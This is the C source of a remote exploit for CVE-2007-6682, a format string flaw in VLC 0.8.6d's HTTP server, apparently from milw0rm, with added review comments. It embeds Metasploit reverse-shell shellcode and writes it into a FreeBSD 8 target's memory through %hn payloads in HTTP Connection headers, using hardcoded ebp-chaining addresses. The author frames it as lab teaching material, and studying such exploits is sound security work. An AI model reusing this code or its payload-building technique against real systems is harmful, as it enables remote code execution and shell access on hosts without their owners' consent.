| 7| /* Epibite // bite since 1442 |#|
| 8| * pown meme ta mamie |#|
| 9| */ |#|
| 10| |#|
| 11| /* Advisory from Luigi Auriemma |#|
| 12| * CVE-2007-6682 / format string in VideoLAN VLC 0.8.6d |#|
| 13| * |#|
| 14| * Description : |#|
| 15| * Format string vulnerability in the httpd_FileCallBack |#|
| 16| * function (network/httpd.c) in VideoLAN VLC 0.8.6d allows |#|
| 17| * remote attackers to execute arbitrary code via format |#|
| 18| * string specifiers in the Connection parameter. |#|
| 19| */ |#|
| 20| |#|
| 21| /* La faille n'a d'interet que dans un but d'apprentissage |#|
 * d'une technique avancee d'exploitation des chaines de
| 23| * format. |#|
| 24| * |#|
| 25| * Toute la difficulte de l'exploitation est liee au fait |#|
| 26| * que la chaine de format se trouve dans un thread, et |#|
| 27| * la pile remplie avec des adresses du tas. |#|
| 28| * On est donc oblige d'utiliser la technique dite de |#|
| 29| * "l'ebp chaining". |#|
| 30| * |#|
| 31| * On pardonnera le manque de proprete et de portabilite, |#|
| 32| * defauts qui sont expliques et corriges durant son |#|
| 33| * utilisation sur la plateforme de tutoriaux de |#|
| 34| * l'Epitech Security Laboratory. |#|
| 35| */ |#|
| 36| |#|
/* Translation:
 * This is ugly and not cross platform; use it for
 * learning purposes. (^-^)
 */
| 41| |#|
| 42| #include <stdlib.h> |#|
| 43| #include <stdio.h> |#|
| 44| #include <string.h> |#|
| 45| #include <strings.h> |#|
| 46| #include <unistd.h> |#|
| 47| |#|
| 48| #include <netinet/in.h> |#|
| 49| #include <arpa/inet.h> |#|
| 50| |#|
| 51| #include <sys/types.h> |#|
| 52| #include <sys/socket.h> |#|
| 53| |#|
/* Forward declarations for the helpers defined after main().
 * connect_() and write_short() do not report errors to their caller:
 * on failure they terminate the process through exit_(). */
int connect_(char *, int);
void exit_(int, char *);
/* The third parameter (an offset accumulator) was left commented out
 * by the author; the matching bookkeeping in the body is commented out too. */
char *get_payload(unsigned short, unsigned short/* , unsigned
short * */);
void progressbar(void);
void write_short(unsigned short, unsigned short);

/* Fixed prefix of every request.  write_short() appends the Connection
 * header value produced by get_payload() and the terminating CRLFCRLF. */
#define REQUEST "GET / HTTP/1.0\r\n" \
"Connection: "
| 63| |#|
| 64| /* Chaining ebp // FREEBSD8 - 0.8.6d : |#|
| 65| * |#|
| 66| * (0xbf5fa838) -> 0xbf5fafa8 // 12$ httpd_FileCallBack() |#|
| 67| * _____________/ |#|
| 68| * / |#|
| 69| * (0xbf5fafa8) -> 0xbf5fafe8 // 488$ httpd_HostThread() |#|
| 70| * _____________/ |#|
| 71| * / |#|
| 72| * (0xbf5fafe8) -> 0x00000000 // 504$ pthread_getprio() |#|
| 73| * |#|
| 74| * (0xbfbee2b8) // (bf5f)e2b8 is an eip value |#|
| 75| * because we write short by short, |#|
| 76| * we've just have to write (bfbe) |#|
| 77| * in order to have the sc addr. |#|
| 78| * (0xbf5fa83c) // An eip -> 12$ + 4 |#|
| 79| */ |#|
| 80| |#|
| 81| #define FIRST_EBP 12 |#|
| 82| #define SECOND_EBP 488 |#|
| 83| #define THIRD_EBP 504 |#|
| 84| |#|
| 85| #define FBSD8_ESP ( 0xbf5fa808 ) |#|
| 86| #define FBSD8_SCADDR ( 0xbfbee2b8 ) |#|
| 87| |#|
| 88| int port; |#|
| 89| char *ip; |#|
| 90| |#|
| 91| /* bsd_ia32_reverse - LHOST=127.0.0.1 LPORT=4321 Size=92 |#|
| 92| http://metasploit.com */ |#|
| 93| unsigned char scode[] = |#|
| 94| "\x33\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c" |#|
| 95| "\x3c\x56\xcc\x83\xeb\xfc\xe2\xf4\x06\x5d\x0e\x55\x3e\x7e\x04\x8e" |#|
| 96| "\x3e\x54\x29\xcc\x6c\x3d\x9b\x4c\x04\x2c\x54\xdc\x8d\xb5\xb7\xa6" |#|
| 97| "\x7c\x6d\x06\x9d\xfb\x56\x34\x94\xa1\xbc\x3c\xce\x35\x8c\x0c\x9d" |#|
| 98| "\x3b\x6d\x9b\x4c\x25\x45\xa0\x9c\x04\x13\x79\xbf\x04\x54\x79\xae" |#|
| 99| "\x05\x52\xdf\x2f\x3c\x68\x05\x9f\xdc\x07\x9b\x4c"; |#|
|100| |#|
/* Entry point.  Usage: exploit <ip> <port>.
 *
 * Every address used below is a compile-time constant for the single
 * FreeBSD 8 / VLC 0.8.6d layout described in the "Chaining ebp" comment
 * above; nothing is probed or adjusted at run time.  Each write_short()
 * call opens a new connection and sends one complete request.
 *
 * Review notes (left as-is):
 *  - atoi() on argv[2] gives no error reporting; strtol() would.
 *  - strlen() returns size_t but is printed with %d.
 *  - scode (an unsigned char array) is read two bytes at a time through
 *    an unsigned short pointer; that is an aliasing/alignment caveat, and
 *    strlen() is re-evaluated on every loop iteration.
 */
int main(int argc, char **argv)
{
  unsigned int i;

  if (argc < 3)
    (void) exit_(1, "Usage: exploit ip port\n");
  ip = argv[1];
  port = atoi(argv[2]);
  printf("[+] Victim is : %s:%d...\n", ip, port);
  printf("[+] Shellcode size : %d // located at : 0x%08x\n",
         strlen((char *)scode), FBSD8_SCADDR);
  printf("[+] EIP is located at : 0x%08x\n",
         FBSD8_ESP + FIRST_EBP * 4 + 4 + 2);

  /* The first argument of every call is truncated to 16 bits by the cast;
   * the second is one of the positional indices from the header comment. */
  (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2),
                     FIRST_EBP);
  (void) write_short((unsigned short)(FBSD8_SCADDR >> 16),
                     SECOND_EBP);
  (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)),
                     FIRST_EBP);

  /* Two requests per pair of scode bytes. */
  for (i = 0; i < strlen((char*)scode); i += 2)
  {
    (void) write_short((unsigned short)(FBSD8_SCADDR + i),
                       SECOND_EBP);
    (void) write_short((unsigned short)(*((unsigned short *)(scode + i))),
                       THIRD_EBP);
  }

  (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2),
                     FIRST_EBP);
  (void) write_short((unsigned short)(FBSD8_ESP >> 16), SECOND_EBP);
  (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)),
                     FIRST_EBP);
  (void) write_short((unsigned short)(FBSD8_ESP + FIRST_EBP * 4 + 4 + 2),
                     SECOND_EBP);
  (void) write_short((unsigned short)(FBSD8_SCADDR >> 16), THIRD_EBP);

  printf("[+] Done.\n");
  return (0);
}
|146| |#|
/* Builds the Connection header value for one request.
 *
 * data: 16-bit value encoded into the string; pop: positional index.
 * For data >= 8 the result is "%<data>u%<pop>$hn"; for data < 8 the
 * author instead emits data literal '0' characters followed by
 * "%<pop>$hn".
 *
 * Returns a pointer to a static buffer that is overwritten on every call
 * (not reentrant; the caller must not free it).  sprintf() is unbounded,
 * but both arguments are unsigned short, so the longest possible result,
 * "%65535u%65535$hn", is 16 bytes and fits in buffer[32].
 */
char *get_payload(unsigned short data,
                  unsigned short pop
                  /* unsigned short *offset */)
{
  static char buffer[32];
  char buffi[9];

  /* data = data - *offset; */
  if ((unsigned short)data < 8)   /* the cast is a no-op: data is already unsigned short */
  {
    memset(buffi, '0', 9);
    buffi[data] = '\0';           /* data < 8, so the index stays inside buffi[9] */
    sprintf(buffer, "%s%%%d$hn", buffi, pop);
  }
  else
    sprintf(buffer, "%%%du%%%d$hn", data, pop);
  /* *offset = *offset + data; */
  return (buffer);
}
|166| | |
/* Opens a connection, sends one request whose Connection header is
 * get_payload(data, pop), drains and discards the response, then closes
 * the socket.  A failed or short write() and a failed close() terminate
 * the program through exit_().
 *
 * Review notes (left as-is):
 *  - only the first 42 bytes of buff are zeroed; strcat() only needs
 *    buff[0] == '\0', and the assembled request is at most 48 bytes
 *    (28-byte REQUEST, <= 16-byte payload, 4-byte CRLFCRLF), so this
 *    works but depends on those sizes staying small.
 *  - the drain loop stops only when read() returns 0; a -1 error return
 *    is non-zero and keeps the loop spinning.
 */
void write_short(unsigned short data, unsigned short pop)
{
  char buff[1024];
  int ret;
  int sock;

  memset(buff, '\0', 42);
  strcat(buff, REQUEST);
  strcat(buff, get_payload(data, pop));
  strcat(buff, "\r\n\r\n");
  sock = connect_(ip, port);
  /* A short write is treated as a failure rather than retried. */
  if (write(sock, buff, strlen(buff)) < (int)strlen(buff))
    (void) exit_(1, "[-] write()\n");
  while ((ret = read(sock, buff, 1024)))
    ;
  if (close(sock) < 0)
    (void) exit_(1, "[-] close()\n");
  return ;
}
|186| | |
/* Writes bite to stderr with an unbuffered write(2) and terminates the
 * process with status i.  Never returns. */
void exit_(int i, char *bite)
{
  size_t len = strlen(bite);

  (void) write(STDERR_FILENO, bite, len);
  exit(i);
}
|192| | |
/* Opens a TCP connection to ip:port and returns the socket descriptor.
 * Prints one progress-bar frame first.  socket() or connect() failure
 * terminates the program through exit_().  ip is converted with
 * inet_addr(), whose INADDR_NONE failure value is not checked. */
int connect_(char *ip, int port)
{
  struct sockaddr_in addr;
  int fd;

  (void) progressbar();
  fd = socket(AF_INET, SOCK_STREAM, 0);
  if (fd < 0)
    (void) exit_(1, "[-] socket()\n");
  memset(&addr, 0, sizeof addr);
  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = inet_addr(ip);
  if (connect(fd, (struct sockaddr *)&addr, sizeof addr) < 0)
    (void) exit_(1, "[-] connect()\n");
  return (fd);
}
|209| | |
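/* Smaller of n and cap; used to keep every write() inside its literal. */
static size_t bounded(size_t n, size_t cap)
{
  return n < cap ? n : cap;
}

/* Writes one frame of an animated progress line to stdout and advances
 * the static frame counter c.
 *
 * The original computed the bar length in one expression that both
 * incremented c and read it again with no sequence point in between
 * (undefined behaviour), and passed byte counts larger than the string
 * literals to write() (out-of-bounds reads of "D ", "p0wn in progress"
 * and " \r").  This version sequences the counter update explicitly and
 * clamps every count to the literal's length; the bar-length formula is
 * otherwise the same.  write() return values are ignored, as before.
 */
void progressbar(void)
{
  static unsigned int c = 0;
  static const char bar[] = "[?] 8=====";
  static const char tip[] = "D ";
  static const char msg[] = "p0wn in progress";
  static const char dots[] = "...";
  static const char tail[] = " \r";
  unsigned int prev = c;            /* counter value before this frame */
  int len;
  size_t barlen, tiplen, ndots;

  c++;
  /* Direction flips every four frames; a 4-byte bump on half the frames.
   * Range is 2..12 (5 +/- 0..3, plus 0 or 4), so len is never negative. */
  len = 5 + (((prev >> 2) & 1) ? -1 : 1) * (int)(c & 3) + (int)(c % 0x20 & 100);
  barlen = bounded((size_t)len, sizeof bar - 1);
  tiplen = barlen < 12 ? bounded(12 - barlen, sizeof tip - 1) : 0;
  ndots = bounded(c / 4 % 4, sizeof dots - 1);

  (void) write(STDOUT_FILENO, bar, barlen);
  (void) write(STDOUT_FILENO, tip, tiplen);
  (void) write(STDOUT_FILENO, msg, sizeof msg - 1);
  (void) write(STDOUT_FILENO, dots, ndots);
  (void) write(STDOUT_FILENO, tail, sizeof tail - 1);
  return ;
}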
|223| | |
|224| // milw0rm.com [2008-04-28] | |